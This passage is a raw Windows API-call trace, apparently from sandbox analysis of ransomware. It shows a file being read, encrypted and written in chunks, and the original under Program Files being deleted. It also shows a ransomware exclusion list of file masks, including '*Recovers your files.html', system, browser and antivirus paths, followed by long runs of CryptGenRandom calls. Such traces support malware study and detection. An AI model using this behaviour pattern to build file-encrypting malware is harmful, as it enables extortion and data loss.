hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0163.569] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x4a, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x4a, lpOverlapped=0x0) returned 1 [0163.569] CryptEncrypt (in: hKey=0x9ad2b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x4a, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x50) returned 1 [0163.569] GetLastError () returned 0x0 [0163.569] WriteFile (in: hFile=0x588, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x50, lpOverlapped=0x0) returned 1 [0163.570] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.570] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.570] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0x20 [0163.570] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf", dwFileAttributes=0x20) returned 0 [0163.570] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf") returned 1 [0163.570] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf")) returned 0 [0163.570] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" [0163.570] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.570] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF260.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf260.tmp")) returned 0xf260 [0163.571] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\grid_(inch).wmf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\grid_(inch).wmf"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF260.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf260.tmp"), dwFlags=0x1) returned 0 [0163.571] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF260.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf260.tmp")) returned 1 [0163.571] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0163.571] wcslen (_String="OK") returned 0x2 [0163.572] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.572] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.572] CryptDestroyKey (hKey=0x9ad278) returned 1 [0163.572] CryptDestroyHash (hHash=0x9ad7f8) returned 1 [0163.572] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0163.572] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*NMCRYPT") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*Recovers your files.html") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.exe") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.dll") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.lnk") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.bat") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.ini") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.msi") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*.scf") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*pagefile.sys*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*NTUSER.DAT*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*AppData*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\winrar\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\java\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\TeamViewer\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\windows\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\ESET\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\AVG\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\AVIRA\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*\\AVAST Software\\*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*Atheros*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*Realtek*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*bootmgr*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*boot*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*boot*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*CONFIG.SYS*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*IO.SYS*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*MSDOS.SYS*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*NTDETECT.COM*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*ntldr*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*chrome*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*opera*") returned 0 [0163.572] PathMatchSpecW (pszFile="Hand Prints.htm", pszSpec="*firefox*") returned 0 [0163.572] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Hand Prints.htm", pszSpec="*") returned 1 [0163.572] strlen (_Str="NMoreira") returned 0x8 [0163.572] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.572] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.572] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.572] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.573] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.574] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.575] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 